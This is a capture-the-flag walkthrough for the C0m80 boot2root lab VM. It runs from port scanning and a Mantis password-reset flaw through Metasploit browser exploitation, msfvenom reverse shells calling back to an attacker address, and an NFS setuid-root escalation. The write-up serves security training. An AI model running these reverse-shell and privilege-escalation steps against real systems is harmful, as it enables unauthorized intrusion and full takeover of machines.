Hello friends! Today we are going to take
another CTF challenge known as C0m80. The credit for making this vm machine
goes to “3mrgnc3” and it is
another boot2root challenge in which our goal is to get root to complete the
challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM
(Here, I have it at 192.168.1.127 but you will have to find your own)
netdiscover
Use nmap for port enumeration
nmap –A –p- 192.168.1.127
We find that port 80, 111, 139, 445, 2049,
20021, 37196. 40325, 41605, 49418, 58563 are open. As port 80 is running http
we open the ip address in our browser.
We don’t find anything on the web page so
we use dirb to enumerate the directories.
dirb http://192.168.1.127
We find a link to a login page that is
running mantis bug report. We find that the version is vulnerable; we can reset
the password of the users with this vulnerability. You can read how to exploit
this vulnerability here.
Now we exploit this vulnerability to change
the password of the users.
We can change password of all the users
present just by changing the id. After changing all the password we find that
alice(id=4) is the only account with administrative privileges.
Going the mails we find a page that
contains a link to a backup file.
We download the backup file using wget to
get more information about the file.
After downloading the backup file we find
that it is a hexdump, we use this program here, to convert it to bin
format.
Then we use binwalk to check for for
embedded file and binaries and find that there are 2 binaries.
binwalk ftp.bin
We use dd to convert the files into exe and
dll, so that we can run the program.
Now we run the program and find it’s a
program for ftp server.
We use netstat to check of ports, and found
that port 20021 opened for listening on our system.
netstat -antp
We use netcat to connect to the system and
find that indeed it is an application for ftpserver.
We now reverse engineer the exe file using
ollydbg for more information. And find that when it reads http: it opens the
link in the the browser.
We use browser autopwn scanner to search for vulnerabilities on the server.
So we setup our listener on metasploit.
msf > use exploit/multi/browser/firefox_proto_crmfrequest
msf exploit(multi/handler) > set
lhost 192.168.1.130
msf exploit(multi/handler) > set
lport 4444
msf exploit(multi/handler) > set
target 1
msf exploit(multi/handler) > set
payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > run
Now we copy the link given by metasploit
and use it in the ftp server running on the target machine.
As soon as we run the command we get our
reverse shell.
Going through the files we get a hint of
file that contains all the passwords.
So we use the search command to find all
the files with that name on the server.
We download the file on our server.
Now we open the file and find all the
passwords.
Now as the author of the machine states
that we can directly access the machine, we go to the server and use the
password we find for rdp.
Now
we have access to the machine we find a ssh private key but our nmap scan
showed no ssh service running on the server so we take a look at the ssh
configuration files and find that the ssh only accepts local connections on
port 65122
Now we use the private key we find to login
as al1ce, as it is the other account used on this server.
When we try to login through ssh using the
key. We use plink to connect, we get a prompt to unlock the key we use the
password we find al1ce (7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286) and unlock the
private key.
plink –l al1ce localhost –I id_rsa –P
65122
Now we are login as al1ce.
Now the server is running nfs on port 111,
we can use this to upload setuid root binaries.
Now we create a shell using metasploit.
msfvenom -p
linux/x86/meterpreter/reverse_tcp lhost=192.168.1.130 lport=4444 -f elf >
shell
Now we setup our listener using metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set
payload linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set
lhost 192.168.1.130
msf exploit(multi/handler) > set
lport 4444
msf exploit(multi/handler) > set
run
Now we use a script called nsfpysh to
interact with nsf, we upload our shell and give him executable permission along
with setuid.
Now we go to the target machine and run the
shell.
As soon as we run the shell, we get the
reverse shell as root.
Now we find that we are the root user.
Now we go to the root folder and find the
congratulatory flag.
